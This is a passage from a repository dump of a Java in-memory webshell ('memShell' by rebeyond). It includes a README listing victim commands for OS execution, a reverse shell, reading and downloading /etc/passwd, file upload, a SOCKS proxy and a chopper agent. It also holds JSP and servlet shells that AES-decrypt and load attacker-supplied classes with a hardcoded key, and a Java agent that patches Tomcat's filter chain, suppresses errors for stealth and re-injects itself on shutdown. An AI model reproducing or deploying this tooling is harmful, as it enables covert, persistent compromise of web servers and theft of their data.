 8 | # usage
 9 | * anyurl?pass_the_world=pass //show this help page.  
10 | * anyurl?pass_the_world=pass&model=exec&cmd=whoami  //run os command.  
11 | * anyurl?pass_the_world=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51.  
12 | * anyurl?pass_the_world=pass&model=urldownload&url=http://xxx.com/test.pdf&path=/tmp/test.pdf //download a remote file via the victim's network directly.  
13 | * anyurl?pass_the_world=pass&model=list[del|show]&path=/etc/passwd  //list,delete,show the specified path or file.  
14 | * anyurl?pass_the_world=pass&model=download&path=/etc/passwd  //download the specified file on the victim's disk.  
15 | * anyurl?pass_the_world=pass&model=upload&path=/tmp/a.elf&content=this_is_content[&type=b]   //upload a text file or a base64 encoded binary file to the victim's disk.  
16 | * anyurl?pass_the_world=pass&model=proxy  //start a socks proxy server on the victim.  
17 | * anyurl?pass_the_world=pass&model=chopper  //start a chopper server agent on the victim.  
18 | 
19 | **!!!It is recommended to use the POST method to submit data.** 
20 | 
21 | # note
22 | For learning exchanges only, do not use for illegal purposes.by rebeyond.
23 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/agent.iml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <module type="JAVA_MODULE" version="4">
 3 |   <component name="NewModuleRootManager" inherit-compiler-output="true">
 4 |     <exclude-output />
 5 |     <content url="file://$MODULE_DIR$">
 6 |       <sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
 7 |     </content>
 8 |     <orderEntry type="inheritedJdk" />
 9 |     <orderEntry type="sourceFolder" forTests="false" />
10 |     <orderEntry type="library" name="agent" level="project" />
11 |     <orderEntry type="library" name="tools" level="project" />
12 |     <orderEntry type="library" name="javax.servlet-api-3.1.0" level="project" />
13 |   </component>
14 | </module>


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/lib/agent.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/lib/agent.jar


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/lib/tools.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/lib/tools.jar


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/pom.xml:
--------------------------------------------------------------------------------
 1 | <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 2 |   <modelVersion>4.0.0</modelVersion>
 3 |   <groupId>ParaShell</groupId>
 4 |   <artifactId>ParaShell</artifactId>
 5 |   <version>0.0.1-SNAPSHOT</version>
 6 |   <build>
 7 |     <sourceDirectory>src</sourceDirectory>
 8 |     <plugins>
 9 |       <plugin>
10 |         <artifactId>maven-compiler-plugin</artifactId>
11 |         <version>3.6.1</version>
12 |         <configuration>
13 |           <source>1.6</source>
14 |           <target>1.6</target>
15 |         </configuration>
16 |       </plugin>
17 |     </plugins>
18 |   </build>
19 |   <dependencies>
20 |   <!-- https://mvnrepository.com/artifact/org.javassist/javassist -->
21 | <dependency>
22 |     <groupId>org.javassist</groupId>
23 |     <artifactId>javassist</artifactId>
24 |     <version>3.22.0-GA</version>
25 | </dependency>
26 |     </dependencies>
27 | </project>


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/src/net/rebeyond/memshell/Evaluate.java:
--------------------------------------------------------------------------------
 1 | package net.rebeyond.memshell;
 2 | 
 3 | import net.rebeyond.memshell.redefine.MyRequest;
 4 | import net.rebeyond.memshell.redefine.MyResponse;
 5 | import net.rebeyond.memshell.redefine.MySession;
 6 | 
 7 | import javax.crypto.Cipher;
 8 | import javax.crypto.spec.SecretKeySpec;
 9 | import javax.servlet.ServletRequest;
10 | import javax.servlet.ServletResponse;
11 | import javax.servlet.http.HttpServletRequest;
12 | import javax.servlet.http.HttpServletResponse;
13 | import java.io.BufferedReader;
14 | import java.io.IOException;
15 | import java.lang.reflect.Method;
16 | import java.net.URL;
17 | import java.net.URLClassLoader;
18 | 
19 | 
20 | public class Evaluate {
21 | 
22 |     private static final long serialVersionUID = 1L;
23 | 
24 |     class U extends ClassLoader {
25 |         U(ClassLoader c) {
26 |             super(c);
27 |         }
28 | 
29 |         public Class g(byte[] b) {
30 |             return super.defineClass(b, 0, b.length);
31 |         }
32 |     }
33 | 
34 |     public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
35 |         doPost(request, response);
36 |     }
37 | 
38 |     public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException {
39 | 
40 |         try {
41 |             if (MyRequest.getMethod(request).equals("POST")) {
42 |                 String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/
43 |                 MySession.setAttribute(MyRequest.getSession(request),"u", k);
44 |                 Cipher c = Cipher.getInstance("AES");
45 |                 c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
46 |                 Object[] objects = new Object[]{request,response,MyRequest.getSession(request)};
47 |                 BufferedReader bf = MyRequest.getReader(request);
48 | 
49 |                 byte[] evilClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(bf.readLine()));
50 | 
51 |                 String sb = new String(evilClassBytes);
52 |                 //MyResponse.getWriter(response).print(sb);
53 |                 Class evilClass = new U(this.getClass().getClassLoader()).g(evilClassBytes);
54 |                 Object a = evilClass.newInstance();
55 |                 a.equals(objects);
56 |                 return;
57 | //                Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
58 | //                method.setAccessible(true);
59 | //                byte[] bytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
60 | ////                Object u = new U(this.getClass().getClassLoader());
61 | ////                u.g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(bf.readLine()))).newInstance().equals(objects);
62 | //                ((Class) method.invoke(new URLClassLoader(new URL[]{}, this.getClass().getClassLoader()), bytes, 0, bytes.length)).newInstance().equals(objects);
63 | //            if (MyRequest.getMethod(request).equals("POST")) {
64 | //                Object session = MyRequest.getSession(request);
65 | //                String k = "e45e329feb5d925b";
66 | //                MySession.setAttribute(session, "u", k);
67 | //                Cipher c = Cipher.getInstance("AES");
68 | //                c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
69 | //
70 | //                Object[] objects = new Object[]{request, response, session};
71 | //                Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
72 | //                method.setAccessible(true);
73 | //                //BufferedReader bf = MyRequest.getReader(request);
74 | //                byte[] bytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
75 | //                ((Class) method.invoke(new URLClassLoader(new URL[]{}, this.getClass().getClassLoader()), bytes, 0, bytes.length)).newInstance().equals(objects);
76 | //                return;
77 | //                //new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(objects);
78 |             }
79 |             } catch (Exception e) {
80 |             e.printStackTrace();
81 |         }
82 | 
83 |     }
84 | 
85 | }
86 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/src/net/rebeyond/memshell/redefine/MyRequest.java:
--------------------------------------------------------------------------------
 1 | package net.rebeyond.memshell.redefine;
 2 | import java.io.BufferedReader;
 3 | import java.lang.reflect.InvocationTargetException;
 4 | 
 5 | public class MyRequest {
 6 | 	public static String getParameter(Object request,String name) throws Exception
 7 | 	{
 8 | 		return (String)request.getClass().getMethod("getParameter", String.class).invoke(request, name);
 9 | 	}
10 | 	public static Object getServletContext(Object request) throws Exception
11 | 	{
12 | 		return request.getClass().getMethod("getServletContext", null).invoke(request, new Object[] {});
13 | 	}
14 | 	public static String getHeader(Object request,String name) throws Exception
15 | 	{
16 | 		return (String)request.getClass().getMethod("getHeader", String.class).invoke(request, name);
17 | 	}
18 | 	
19 | 	public static Object getSession(Object request) throws Exception
20 | 	{
21 | 		return request.getClass().getMethod("getSession",  null).invoke(request, new Object[] {});
22 | 	}
23 | 	public static int getContentLength(Object request) throws Exception
24 | 	{
25 | 		return Integer.parseInt(request.getClass().getMethod("getContentLength",  null).invoke(request, new Object[] {}).toString());
26 | 	}
27 | 	
28 | 	public static Object getInputStream(Object request) throws Exception
29 | 	{
30 | 		return request.getClass().getMethod("getInputStream", null).invoke(request, new Object[] {});
31 | 	}
32 | 
33 | 	public static BufferedReader getReader(Object request) throws Exception {
34 | 		return (BufferedReader) request.getClass().getMethod("getReader", null).invoke(request,new Object[] {});
35 | 	}
36 | 
37 | 	public static String getMethod(Object request) throws Exception {
38 | 		return (String) request.getClass().getMethod("getMethod", null).invoke(request,new Object[] {});
39 | 	}
40 | }
41 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/src/net/rebeyond/memshell/redefine/MyResponse.java:
--------------------------------------------------------------------------------
 1 | package net.rebeyond.memshell.redefine;
 2 | import java.io.PrintWriter;
 3 | 
 4 | public class MyResponse {
 5 | 	public static void setContentType(Object response,String arg) throws Exception
 6 | 	{
 7 | 		response.getClass().getMethod("setContentType", String.class).invoke(response, arg);
 8 | 	}
 9 | 	public static void setCharacterEncoding(Object response,String arg) throws Exception
10 | 	{
11 | 		response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, arg);
12 | 	}
13 | 	public static PrintWriter getWriter(Object response) throws Exception
14 | 	{
15 | 		return (PrintWriter)response.getClass().getMethod("getWriter",null).invoke(response, new Object[] {});
16 | 	}
17 | 	
18 | 	public static void reset(Object response) throws Exception
19 | 	{
20 | 		response.getClass().getMethod("reset", null).invoke(response, new Object[] {});
21 | 	}
22 | 	
23 | 	public static Object getOutputStream(Object response) throws Exception
24 | 	{
25 | 		return response.getClass().getMethod("getOutputStream", null).invoke(response, new Object[] {});
26 | 	}
27 | 	public static void setHeader(Object response,String arg1,String arg2) throws Exception
28 | 	{
29 | 		response.getClass().getMethod("setHeader", String.class, String.class).invoke(response, arg1,arg2);
30 | 	}
31 | 
32 | 	public static void setStatus(Object response, int arg1) throws  Exception {
33 | 		response.getClass().getMethod("setStatus", Integer.class).invoke(response,arg1);
34 | 	}
35 | }
36 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/src/net/rebeyond/memshell/redefine/MyServletContext.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell.redefine;
2 | 
3 | public class MyServletContext {
4 | 	public static String getRealPath(Object servletContext ,String arg) throws Exception
5 | 	{
6 | 		return servletContext.getClass().getMethod("getRealPath", String.class).invoke(servletContext, arg).toString();
7 | 	}
8 | }
9 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/src/net/rebeyond/memshell/redefine/MyServletInputStream.java:
--------------------------------------------------------------------------------
 1 | package net.rebeyond.memshell.redefine;
 2 | 
 3 | public class MyServletInputStream {
 4 | 	public static void read(Object servletInputStream ,byte[] a,int b,int c) throws Exception
 5 | 	{
 6 | 		servletInputStream.getClass().getMethod("read", byte[].class,int.class,int.class).invoke(servletInputStream, a,b,c);
 7 | 	}
 8 | 	
 9 | }
10 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/src/net/rebeyond/memshell/redefine/MyServletOutputStream.java:
--------------------------------------------------------------------------------
 1 | package net.rebeyond.memshell.redefine;
 2 | 
 3 | public class MyServletOutputStream {
 4 | 	public static void write(Object servletOutputStream ,byte[] a,int b,int c) throws Exception
 5 | 	{
 6 | 		servletOutputStream.getClass().getMethod("write", byte[].class,int.class,int.class).invoke(servletOutputStream, a,b,c);
 7 | 	}
 8 | 	
 9 | 	public static void close(Object servletOutputStream ) throws Exception
10 | 	{
11 | 		servletOutputStream.getClass().getMethod("close",null).invoke(servletOutputStream,new Object[] {});
12 | 	}
13 | 	
14 | 	public static void flush(Object servletOutputStream ) throws Exception
15 | 	{
16 | 		servletOutputStream.getClass().getMethod("flush",null).invoke(servletOutputStream,new Object[] {});
17 | 	}
18 | }
19 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_agent/memShell/src/net/rebeyond/memshell/redefine/MySession.java:
--------------------------------------------------------------------------------
 1 | package net.rebeyond.memshell.redefine;
 2 | 
 3 | 
 4 | import java.util.Enumeration;
 5 | 
 6 | public class MySession {
 7 | 	public static void setAttribute(Object httpSession,String arg1,Object arg2) throws Exception
 8 | 	{
 9 | 		httpSession.getClass().getMethod("setAttribute",String.class,Object.class).invoke(httpSession, arg1,arg2);
10 | 	}
11 | 	
12 | 	public static Object getAttribute(Object httpSession,String arg1) throws Exception
13 | 	{
14 | 		return httpSession.getClass().getMethod("getAttribute",String.class).invoke(httpSession, arg1);
15 | 	}
16 | 	
17 | 	
18 | 	public static void invalidate(Object httpSession) throws Exception
19 | 	{
20 | 		httpSession.getClass().getMethod("invalidate",null).invoke(httpSession, new Object[] {});
21 | 	}
22 | 
23 | 	public static void removeAttribute(Object httpSession, String arg1) throws Exception
24 | 	{
25 | 		httpSession.getClass().getMethod("removeAttribute",null).invoke(httpSession, arg1);
26 | 	}
27 | 
28 | 	public  static Enumeration<String> getAttributeNames (Object httpSession) throws Exception{
29 | 		return (Enumeration<String>) httpSession.getClass().getMethod("getAttributeNames",null).invoke(httpSession);
30 | 	}
31 | }
32 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/.classpath:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <classpath>
 3 | 	<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/JavaSE-1.6">
 4 | 		<attributes>
 5 | 			<attribute name="maven.pomderived" value="true"/>
 6 | 		</attributes>
 7 | 	</classpathentry>
 8 | 	<classpathentry kind="src" output="target/classes" path="src">
 9 | 		<attributes>
10 | 			<attribute name="optional" value="true"/>
11 | 			<attribute name="maven.pomderived" value="true"/>
12 | 		</attributes>
13 | 	</classpathentry>
14 | 	<classpathentry kind="con" path="org.eclipse.m2e.MAVEN2_CLASSPATH_CONTAINER">
15 | 		<attributes>
16 | 			<attribute name="maven.pomderived" value="true"/>
17 | 		</attributes>
18 | 	</classpathentry>
19 | 	<classpathentry kind="lib" path="C:/Program Files/Java/jdk1.7.0_21/lib/tools.jar"/>
20 | 	<classpathentry kind="con" path="org.eclipse.jst.server.core.container/org.eclipse.jst.server.tomcat.runtimeTarget/Apache Tomcat v7.0"/>
21 | 	<classpathentry kind="output" path="target/classes"/>
22 | </classpath>
23 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/.fatjar:
--------------------------------------------------------------------------------
 1 | #Fat Jar Configuration File
 2 | #Wed May 23 12:38:25 CST 2018
 3 | onejar.license.required=true
 4 | manifest.classpath=
 5 | manifest.removesigners=true
 6 | onejar.checkbox=false
 7 | jarname=E\:/agent.jar
 8 | manifest.mergeall=true
 9 | manifest.mainclass=Attach
10 | manifest.file=src\\META-INF\\MANIFEST.MF
11 | jarname.isextern=true
12 | onejar.expand=
13 | excludes=<jar|tools.jar>;<jar|annotations-api.jar>;<jar|catalina-ant.jar>;<jar|catalina-ha.jar>;<jar|catalina-tribes.jar>;<jar|catalina.jar>;<jar|ecj-4.4.2.jar>;<jar|el-api.jar>;<jar|jasper-el.jar>;<jar|jasper.jar>;<jar|jsp-api.jar>;<jar|servlet-api.jar>;<jar|tomcat-api.jar>;<jar|tomcat-coyote.jar>;<jar|tomcat-dbcp.jar>;<jar|tomcat-i18n-es.jar>;<jar|tomcat-i18n-fr.jar>;<jar|tomcat-i18n-ja.jar>;<jar|tomcat-jdbc.jar>;<jar|tomcat-util.jar>;<jar|tomcat7-websocket.jar>;<jar|websocket-api.jar>
14 | includes=
15 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/.project:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <projectDescription>
 3 | 	<name>memShell</name>
 4 | 	<comment></comment>
 5 | 	<projects>
 6 | 	</projects>
 7 | 	<buildSpec>
 8 | 		<buildCommand>
 9 | 			<name>org.eclipse.jdt.core.javabuilder</name>
10 | 			<arguments>
11 | 			</arguments>
12 | 		</buildCommand>
13 | 		<buildCommand>
14 | 			<name>org.eclipse.m2e.core.maven2Builder</name>
15 | 			<arguments>
16 | 			</arguments>
17 | 		</buildCommand>
18 | 	</buildSpec>
19 | 	<natures>
20 | 		<nature>org.eclipse.m2e.core.maven2Nature</nature>
21 | 		<nature>org.eclipse.jdt.core.javanature</nature>
22 | 	</natures>
23 | </projectDescription>
24 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: net.rebeyond.memshell.Attach
3 | 
4 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/README.md:
--------------------------------------------------------------------------------
 1 | # memShell
 2 | a webshell resides in the memory of java web server
 3 | 
 4 | # install
 5 | * unzip memShell.zip
 6 | * cd memShell
 7 | * java -jar inject.jar
 8 | # usage
 9 | * anyurl?pass_the_world=pass //show this help page.  
10 | * anyurl?pass_the_world=pass&model=exec&cmd=whoami  //run os command.  
11 | * anyurl?pass_the_world=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51.  
12 | * anyurl?pass_the_world=pass&model=urldownload&url=http://xxx.com/test.pdf&path=/tmp/test.pdf //download a remote file via the victim's network directly.  
13 | * anyurl?pass_the_world=pass&model=list[del|show]&path=/etc/passwd  //list,delete,show the specified path or file.  
14 | * anyurl?pass_the_world=pass&model=download&path=/etc/passwd  //download the specified file on the victim's disk.  
15 | * anyurl?pass_the_world=pass&model=upload&path=/tmp/a.elf&content=this_is_content[&type=b]   //upload a text file or a base64 encoded binary file to the victim's disk.  
16 | * anyurl?pass_the_world=pass&model=proxy  //start a socks proxy server on the victim.  
17 | * anyurl?pass_the_world=pass&model=chopper  //start a chopper server agent on the victim.  
18 | 
19 | **!!!It is recommended to use the POST method to submit data.** 
20 | 
21 | # note
22 | For learning exchanges only, do not use for illegal purposes.by rebeyond.
23 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/inject.iml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <module type="JAVA_MODULE" version="4">
 3 |   <component name="NewModuleRootManager" inherit-compiler-output="true">
 4 |     <exclude-output />
 5 |     <content url="file://$MODULE_DIR$">
 6 |       <sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
 7 |     </content>
 8 |     <orderEntry type="inheritedJdk" />
 9 |     <orderEntry type="sourceFolder" forTests="false" />
10 |     <orderEntry type="library" name="inject" level="project" />
11 |     <orderEntry type="library" name="javax.servlet-api-3.1.0" level="project" />
12 |     <orderEntry type="library" name="reinject" level="project" />
13 |     <orderEntry type="library" name="agent (2)" level="project" />
14 |     <orderEntry type="library" name="agent (3)" level="project" />
15 |     <orderEntry type="library" name="agent (4)" level="project" />
16 |   </component>
17 | </module>


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/lib/agent.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/lib/agent.jar


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/lib/inject.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/lib/inject.jar


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/lib/javax.servlet-api-3.1.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/lib/javax.servlet-api-3.1.0.jar


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/out/agent.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/out/agent.jar


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/out/inject.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/out/inject.jar


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/out/shell_3_0_2.jsp:
--------------------------------------------------------------------------------
 1 | <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %>
 2 | <%!
 3 |     class U extends ClassLoader {
 4 |         U(ClassLoader c) {
 5 |             super(c);
 6 |         }
 7 | 
 8 |         public Class g(byte[] b) {
 9 |             return super.defineClass(b, 0, b.length);
10 |         }
11 |     }
12 | %><%
13 |     if (request.getMethod().equals("POST")) {
14 |         String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/
15 |         session.putValue("u", k);
16 |         Cipher c = Cipher.getInstance("AES");
17 |         c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
18 |         new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(new Object[]{request,response,session});
19 |     }
20 | %>


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/out/shell_3_0_5.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/pom.xml:
--------------------------------------------------------------------------------
 1 | <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 2 |   <modelVersion>4.0.0</modelVersion>
 3 |   <groupId>ParaShell</groupId>
 4 |   <artifactId>ParaShell</artifactId>
 5 |   <version>0.0.1-SNAPSHOT</version>
 6 |   <build>
 7 |     <sourceDirectory>src</sourceDirectory>
 8 |     <plugins>
 9 |       <plugin>
10 |         <artifactId>maven-compiler-plugin</artifactId>
11 |         <version>3.6.1</version>
12 |         <configuration>
13 |           <source>1.6</source>
14 |           <target>1.6</target>
15 |         </configuration>
16 |       </plugin>
17 |     </plugins>
18 |   </build>
19 |   <dependencies>
20 |   <!-- https://mvnrepository.com/artifact/org.javassist/javassist -->
21 | <dependency>
22 |     <groupId>org.javassist</groupId>
23 |     <artifactId>javassist</artifactId>
24 |     <version>3.22.0-GA</version>
25 | </dependency>
26 |     </dependencies>
27 | </project>


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/src/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0 
2 | Agent-Class: net.rebeyond.memshell.Agent
3 | Can-Retransform-Classes: true


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/src/net/rebeyond/memshell/Agent.java:
--------------------------------------------------------------------------------
  1 | package net.rebeyond.memshell;
  2 | import java.io.BufferedReader;
  3 | import java.io.File;
  4 | import java.io.FileInputStream;
  5 | import java.io.FileOutputStream;
  6 | import java.io.InputStream;
  7 | import java.io.InputStreamReader;
  8 | import java.lang.instrument.Instrumentation;
  9 | import java.lang.management.ManagementFactory;
 10 | import java.lang.management.RuntimeMXBean;
 11 | import java.net.HttpURLConnection;
 12 | import java.net.InetAddress;
 13 | import java.net.URL;
 14 | import java.util.Arrays;
 15 | import java.util.Set;
 16 | 
 17 | import javax.management.MBeanServer;
 18 | import javax.management.ObjectName;
 19 | import javax.management.Query;
 20 | 
 21 | public class Agent {
 22 | 	public static String className = "org.apache.catalina.core.ApplicationFilterChain";
 23 | 	public static byte[] injectFileBytes = new byte[] {}, agentFileBytes = new byte[] {};
 24 | 	public static String currentPath;
 25 | 	public static String password = "rebeyond";
 26 | 
 27 | 	public static void agentmain(String agentArgs, Instrumentation inst) {
 28 | 		inst.addTransformer(new Transformer(), true);
 29 | 		if (agentArgs.indexOf("^") >= 0) {
 30 | 			Agent.currentPath = agentArgs.split("\\^")[0];
 31 | 			Agent.password = agentArgs.split("\\^")[1];
 32 | 		} else {
 33 | 			Agent.currentPath = agentArgs;
 34 | 		}
 35 | 		System.out.println("Agent Main Done");
 36 | 		Class[] loadedClasses = inst.getAllLoadedClasses();
 37 | 		for (Class c : loadedClasses) {
 38 | 			if (c.getName().equals(className)) {
 39 | 				try {
 40 | 					inst.retransformClasses(c);
 41 | 				} catch (Exception e) {
 42 | 					// TODO Auto-generated catch block
 43 | 					e.printStackTrace();
 44 | 				}
 45 | 			}
 46 | 		}
 47 | 
 48 | 		try {
 49 | 			initLoad();
 50 | 			readInjectFile(Agent.currentPath);
 51 | 			readAgentFile(Agent.currentPath);
 52 | 			clear(Agent.currentPath);
 53 | 		} catch (Exception e) {
 54 | 			// 为了隐蔽,不要打印异常信息
 55 | 		}
 56 | 		Agent.persist();
 57 | 	}
 58 | 
 59 | 	public static void persist() {
 60 | 		try {
 61 | 			Thread t = new Thread() {
 62 | 				public void run() {
 63 | 					try {
 64 | 						writeFiles("inject.jar", Agent.injectFileBytes);
 65 | 						writeFiles("agent.jar", Agent.agentFileBytes);
 66 | 						startInject();
 67 | 					} catch (Exception e) {
 68 | 
 69 | 					}
 70 | 				}
 71 | 			};
 72 | 			t.setName("shutdown Thread");
 73 | 			Runtime.getRuntime().addShutdownHook(t);
 74 | 		} catch (Throwable t) {
 75 | 
 76 | 		}
 77 | 	}
 78 | 
 79 | 	public static void writeFiles(String fileName, byte[] data) throws Exception {
 80 | 		String tempFolder = System.getProperty("java.io.tmpdir");
 81 | 		FileOutputStream fso = new FileOutputStream(tempFolder + File.separator + fileName);
 82 | 		fso.write(data);
 83 | 		fso.close();
 84 | 	}
 85 | 
 86 | 	public static void readInjectFile(String filePath) throws Exception {
 87 | 		String fileName = "inject.jar";
 88 | 		File f = new File(filePath + File.separator + fileName);
 89 | 		if (!f.exists()) {
 90 | 			f = new File(System.getProperty("java.io.tmpdir") + File.separator + fileName);
 91 | 		}
 92 | 		InputStream is = new FileInputStream(f);
 93 | 		byte[] bytes = new byte[1024 * 100];
 94 | 		int num = 0;
 95 | 		while ((num = is.read(bytes)) != -1) {
 96 | 			injectFileBytes = mergeByteArray(injectFileBytes, Arrays.copyOfRange(bytes, 0, num));
 97 | 		}
 98 | 		is.close();
 99 | 	}
100 | 
101 | 	public static void readAgentFile(String filePath) throws Exception {
102 | 		String fileName = "agent.jar";
103 | 		File f = new File(filePath + File.separator + fileName);
104 | 		if (!f.exists()) {
105 | 			f = new File(System.getProperty("java.io.tmpdir") + File.separator + fileName);
106 | 		}
107 | 		InputStream is = new FileInputStream(f);
108 | 		byte[] bytes = new byte[1024 * 100];
109 | 		int num = 0;
110 | 		while ((num = is.read(bytes)) != -1) {
111 | 			agentFileBytes = mergeByteArray(agentFileBytes, Arrays.copyOfRange(bytes, 0, num));
112 | 		}
113 | 		is.close();
114 | 	}
115 | 
116 | 	public static void startInject() throws Exception {
117 | 		Thread.sleep(2000);
118 | 		String tempFolder = System.getProperty("java.io.tmpdir");
119 | 		String cmd = "java -jar " + tempFolder + File.separator + "inject.jar " + Agent.password;
120 | 		Runtime.getRuntime().exec(cmd);
121 | 	}
122 | 
123 | 	public static void main(String[] args) {
124 | 		try {
125 | 			readAgentFile("e:/");
126 | 			String tempPath = Attach.class.getProtectionDomain().getCodeSource().getLocation().getPath();
127 | 
128 | 			String agentFile = Attach.class.getProtectionDomain().getCodeSource().getLocation().getPath().substring(0,
129 | 					tempPath.lastIndexOf("/"));
130 | 		} catch (Exception e) {
131 | 			// TODO Auto-generated catch block
132 | 			e.printStackTrace();
133 | 		}
